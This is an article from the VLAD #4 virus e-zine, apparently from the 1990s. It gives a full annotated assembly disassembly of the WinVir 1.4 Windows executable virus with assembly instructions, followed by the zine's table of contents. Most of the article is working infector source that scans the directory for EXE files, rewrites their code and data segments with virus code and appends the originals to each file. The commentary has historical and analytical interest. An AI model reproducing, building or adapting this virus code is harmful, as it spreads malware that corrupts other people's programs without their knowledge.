Virus Labs & Distribution
VLAD #4 - WinVir14 Disasm

;       WinVir 1.4 disassembly by Qark
;       Original virus written in the Netherlands
;        by Masud Khafir [Trident] in 1992.
; This is an interesting virus due to the very fact that it was the worlds
; first ever windows executable infector.
; The virus functions by copying code from the original code segment and
; auto data segment at offset 100h and appending it to the end of the
; program.  Then it places it own code and data in the corresponding
; segments.  
; When the infected program is executed from inside windows it will search
; the current directory for any windows executables.  It is very fussy about
; what it will infect, winmine.exe being one of the few programs it will do.
; After infecting all the files it can in the current directory, it will then
; disinfect itself from the program, restoring the original data, and exit
; back to windows.  The user will assume they clicked the icon incorrectly, 
; attempt again, at which time the program will function properly.
; I have heard some Anti-Virus figures claim the virus just fiddles with the
; DOS stub, but this is infact not the case.  It is a full direct action
; WinEXE infector.
; Overall, the virus is well optimised, and it is suprising that seeing
; how well Musad seems to understand the windows executable header that he
; couldn't have contrived to make the virus return directly to the original
; host program and thus make win infection viable earlier.
; There is an error in the virus with an 'lseek' that isn't even used and has
; been left out of the disassembly.
; The disassembly won't compile to be a byte match with the virus but is
; the same otherwise.
; Assemble with:
;  a86 +o winvir14.asm
;  link winvir14;
; Don't ask me why, but even my disassemblies only work with a86 ;)

Virus_seg       Segment
assume cs:virus_seg,ds:data_seg,ss:stack_seg
        org     0fbh            ;This way the code written to the winexe will
                                ;be org 100h
        mov     ax,data_seg
        mov     ds,ax

;--- From here on gets written to the windows executables ---
        push    es              ;Save ES

        push    ds              ;Point DS to ES
        pop     es

        mov     si,offset name_space
        mov     di,offset name_space2
        mov     cx,13
        rep     movsb

        mov     dx,offset dta   ;Set DTA to our data area.
        mov     ah,1ah
        int     21h

        mov     dx,offset wildcard      ;We're looking for this.
        xor     cx,cx                   ;Any attributes.
        mov     ah,4eh                  ;Find first.
        int     21h

        jc      not_found

        mov     dx,offset name_space    ;Infect the file we found.
        call    infect
        mov     ah,4fh                  ;Find next.
        jmp     find_next
        mov     dx,offset name_space2
        call    disinfect
        pop     es                      ;Why bother saving/restoring ES ?

        mov     ax,4c00h                ;Terminate.
        int     21h

;--Start of subroutines--

Infect  Proc    Near

        mov     ax,3d02h
        int     21h
        jc      bad_open
        xchg    bx,ax
        mov     si,offset buffer
        call    file_check
        jc      close_exit
        cmp     word ptr [si+14h],100h  ;Check winexe entry IP. Marker ?
        je      close_exit

        mov     ax,5700h
        int     21h                     ;Get file date and time.

        push    cx
        push    dx
        call    infect_file
        pop     dx
        pop     cx

        mov     ax,5701h                ;Restore file date and time.
        int     21h

        mov     ah,3eh
        int     21h

Infect  Endp

Disinfect       Proc    Near
        mov     ax,3d02h                ;Open file
        int     21h
        jc      bad_open

        xchg    bx,ax

        mov     si,offset buffer
        call    file_check
        jc      close_exit

        ;Is the IP 100h ?  (This is probably the infection marker)
        cmp     word ptr [si+14h],100h
        jne     close_exit

        ;Save time/date.
        mov     ax,5700h
        int     21h

        push    cx
        push    dx
        call    fix_auto_data
        call    fix_code_seg
        pop     dx
        pop     cx

        jmp     close_exit
Disinfect       Endp

File_Check      Proc    Near
        call    read_file
        cmp     word ptr [si],'ZM'
        jne     fail_exit
        cmp     word ptr [si+18h],40h
        jb      fail_exit
        mov     ax,word ptr [si+3ch]
        mov     dx,word ptr [si+3eh]
        call    lseek
        mov     word ptr ne_off,ax
        mov     word ptr ne_off+2,dx
        call    read_file
        cmp     word ptr [si],'EN'              ;NE header ?
        jne     fail_exit
        cmp     word ptr [si+0ch],302h          ;Program/App flags
                                                ;Make sure program is
                                                ;'unshared' and uses win
                                                ;API (why bother checking
                                                ;this ??)
        jne     fail_exit
        cmp     word ptr [si+32h],4             ;Windows shift alignment
        jne     fail_exit                       ;Make sure the shift is
                                                ;the standard value (why?)

        cmp     word ptr [si+36h],802h          ;target OS and exe flags
        jne     fail_exit                       ;Make sure it runs under
                                                ;windows, and gangload area
                                                ;(why for ??)
File_Check      Endp

Infect_File     Proc    Near

        ;Read the code segment entry into cs_seg
        mov     ax,word ptr [si+16h]            ;AX=Newexe CS
        mov     dx,offset cs_seg
        call    read_rout
        ;How big is the CS ?
        cmp     word ptr cs_length,code_size+100h
        jb      badsize

        cmp     byte ptr cs_attrib,50h          ;requires a preloaded,
                                                ;movable segment. (why ??)
        jne     badsize
        ;Read the autodata segment entry into ds_seg
        mov     ax,word ptr [si+0eh]            ;Auto data segment into AX
        mov     dx,offset ds_seg
        call    read_rout

        ;Make sure that DS is big enough for its purpose.
        cmp     word ptr ds_length,datasize+300h
        jb      badsize

        ;Lseek to the codesegment.
        mov     ax,word ptr cs_off
        call    lseek_2_segment

        ;Read in the codesegment
        mov     dx,offset buffer2
        mov     cx,code_size
        call    read_2
        call    lseek_end

        ;Write the original codesegment to the end of the file.
        mov     dx,offset buffer2
        mov     cx,code_size
        call    write_2
        ;Lseek to the automatic datasegment.
        mov     ax,word ptr ds_off
        call    lseek_2_segment
        ;Read in the automatic datasegment.
        mov     dx,offset buffer2
        mov     cx,datasize
        call    read_2
        call    lseek_end

        ;Write the original datasegment to the end of the file, behind
        ; the original code segment.
        mov     dx,offset buffer2
        mov     cx,datasize
        call    write_2

        ;Save original segment attributes.
        push    word ptr cs_attrib
        pop     word ptr seg_attrib

        ;Remove the 'relocations' setting from the segment attribute.
        ;This is so that the code doesn't get trashed by relocations
        ;that were meant for the original program.
        and     word ptr cs_attrib,0feffh

        ;Write the new code segment entry.
        mov     ax,word ptr [si+16h]            ;CS into AX
        mov     dx,offset cs_seg
        call    write_rout

        ;Lseek to the start of the NewEXE header.
        xor     ax,ax
        call    fix_file_pointer
        ;Save the original IP and store it in seg_ip
        push    word ptr [si+14h]
        pop     word ptr seg_ip

        ;Set the IP to 100h
        mov     word ptr [si+14h],100h

        ;Write the modified NE header back.
        call    write_file
        ;Lseek to the code segment.
        mov     ax,word ptr cs_off
        call    lseek_2_segment             
        ;Write the virus code to the code segment.
        push    ds
        push    cs
        pop     ds
        mov     dx,100h                         ;DS:DX start of the virus
        mov     cx,code_size                    ;Size of virus code.
        call    write_2
        pop     ds

        ;Lseek to the auto data segment.
        mov     ax,word ptr ds_off
        call    lseek_2_segment

        ;Write the virus data to the auto data segment.
        mov     dx,100h
        mov     cx,datasize
        call    write_2


Infect_File     Endp

Fix_Auto_Data   Proc    Near
        ;Read the autodata segment entry into ds_seg
        mov     ax,word ptr [si+0eh]
        mov     dx,offset ds_seg
        call    read_rout

        ;Lseek to auto data segment.
        mov     ax,word ptr ds_off
        call    lseek_2_segment

        ;Read in the auto data segment into our data segment.
        mov     dx,offset buffer
        mov     cx,datasize
        call    read_2
Fix_Auto_Data   Endp

Fix_Code_Seg    Proc    Near
        ;Restore the original CS attributes.
        push    word ptr seg_attrib
        pop     word ptr cs_attrib

        ;Write the code segment entry back to the executable.
        mov     ax,word ptr [si+16h]    ;ax=code seg
        call    Write_Rout
        ;Restore original IP.
        push    word ptr seg_ip
        pop     word ptr [si+14h]       ;restore IP

        ;Lseek to start of NE header.
        xor     ax,ax
        call    fix_file_pointer

        ;Write original NE header back.
        call    write_file

        ;Lseek to end of file.
        call    lseek_end

        ;File length is in DX:AX from lseek.  Subtracting will give an
        ;offset from the end of the file.
        sub     ax,datasize
        sbb     dx,0

        push    ax
        push    dx

        ;Lseek to original saved datasegment.
        call    lseek
        ;Read original datasegment into buffer2.
        mov     dx,offset buffer2
        mov     cx,datasize
        call    read_2
        ;Lseek to auto data segment.
        mov     ax,word ptr ds_off
        call    lseek_2_segment
        ;Write the original data segment back.
        mov     dx,offset buffer2
        mov     cx,datasize
        call    write_2

        pop     dx
        pop     ax
        ;DX:AX=file offset of saved original data segment.
        ;Subtracting will point to saved original code segment.
        sub     ax,code_size
        sbb     dx,0
        push    ax
        push    dx

        ;Lseek to saved original code segment.
        call    lseek

        ;Read original code segment into buffer2.
        mov     dx,offset buffer2
        mov     cx,code_size
        call    read_2

        ;Lseek to CS.
        mov     ax,word ptr cs_off
        call    lseek_2_segment
        ;Write original CS back to program.
        mov     dx,offset buffer2
        mov     cx,code_size
        call    write_2

        pop     dx
        pop     ax

        ;Lseek to original stored CS appended to program.
        call    lseek

        ;Truncate the saved data off the end of the file.
        mov     cx,0                            ;xor cx,cx!
        call    write_2

Fix_Code_Seg    Endp

Read_Rout       Proc    Near
        push    dx
        dec     ax                              ;Segment entry - 1
        mov     cx,8                            ;Segment table entry = 8
        mul     cx                              ;Find the CS segment
                                                ;entry offset.
        add     ax,word ptr [si+22h]            ;Segment table offset
        adc     dx,0

        call    fix_file_pointer                ;Will lseek to the segment
                                                ;table entry of the segment.
        pop     dx
        mov     cx,8
        jmp     read_2
Read_Rout       Endp

Read_File       Proc    Near
        mov     dx,offset buffer
        mov     cx,40h

read_2  proc    near
        mov     ah,3fh
        int     21h
read_2  endp
Read_File       EndP

Write_Rout      Proc    Near
        push    dx
        dec     ax                              ;Segment entry - 1
        mov     cx,8                            ;Segment table entry = 8
        mul     cx                              ;Find the CS segment
                                                ;entry offset.
        add     ax,word ptr [si+22h]            ;Segment table offset
        adc     dx,0

        call    fix_file_pointer                ;Will lseek to the segment
                                                ;table entry of the segment.
        pop     dx
        mov     cx,8
        jmp     short write_2

Write_Rout      Endp

Write_File      Proc    Near
        mov     dx,offset buffer
        mov     cx,40h
write_2 proc    near
        mov     ah,40h
        int     21h
write_2 endp
Write_File      Endp

Lseek_End       Proc    Near

        mov     ax,4202h
        xor     cx,cx
        int     21h

Lseek_End       Endp

Fix_File_Pointer        Proc    Near

        add     ax,word ptr ne_off
        adc     dx,word ptr ne_off+2
        jmp     short lseek

Fix_File_Pointer        Endp

Lseek_2_Segment Proc    Near
        mov     cx,10h          ;Since the virus only infects programs
                                ;with a shift of 4 you can multiply by
                                ;16 to get the offset.
        mul     cx
        add     ax,100h         ;why ???
        adc     dx,0
        jmp     short lseek

Lseek_2_Segment Endp

Lseek   Proc    Near
;lseeks to dx:ax
        xchg    cx,dx
        xchg    dx,ax
        mov     ax,4200h
        int     21h

Lseek   Endp

virusname       db      ' Virus_for_Windows  v1.4 '
;The size of the code segment.
Code_Size       equ     offset vcode_end - 100h         ;$-100h
Virus_Seg       Ends

Data_Seg        Segment
        db      100h    dup     (0)             ;This doesn't get written
                                                ;to file.

        buffer          db      40h dup ('a')   ;NE header is read into here.
        ;The code segment entry of the windows file to be infected.
        cs_seg:                                                 ;140h
        cs_off          dw      'bb'
        cs_length       dw      'bb'                            ;142h
        cs_attrib       dw      'bb'                            ;144h
        cs_alloc        dw      'bb'

        ;The data segment entry of the windows file to be infected.
        ds_seg:                                                 ;148h
        ds_off          dw      'cc'
        ds_length       dw      'cc'                            ;14ah
        ds_attrib       dw      'cc'
        ds_alloc        dw      'cc'

        dta             db      30 dup ('d')
        name_space      db      13 dup ('d')
        wildcard        db      '*.EXE',0
        name_space2     db      13 dup ('e')

        ne_off          dd      0
        seg_ip          dw      0
        seg_attrib      dw      0                               ;1a2h
        author          db      'MK92'
        buffer2         db      8 dup (0)                       ;1a8h

Datasize equ offset buffer2 - 100h      ;Size of the datasegment.
Data_Seg        Ends

Stack_Seg       Segment Stack
        db      2000h   dup     (0)
Stack_Seg       Ends

end     start
ARTICLE.0_0       Hidden Area Story By QuantumG


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ARTICLE.2_4       Cryptanalysis
ARTICLE.2_5       Slovakia
ARTICLE.2_6       TBMem Flaws
ARTICLE.2_7       F-Prot Troubles


Win Infection
ARTICLE.3_2       WinVir14 Disasm
ARTICLE.3_3       Andropinis
ARTICLE.3_4       Super Virus-2
ARTICLE.3_5       VTBoot
ARTICLE.3_6       Ebbelwoi VQ7
ARTICLE.3_7       Unix Viruses


Virus Descriptions
ARTICLE.4_2       Ender Wiggin
ARTICLE.4_3       WinSurfer
ARTICLE.4_4       Antipode 2.0
ARTICLE.4_5       Bane
ARTICLE.4_7       Tasha Yar


ARTICLE.5_2       ART v2.2
ARTICLE.5_3       Good Times!
ARTICLE.5_4       DOS Idle
ARTICLE.5_5       Neither
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

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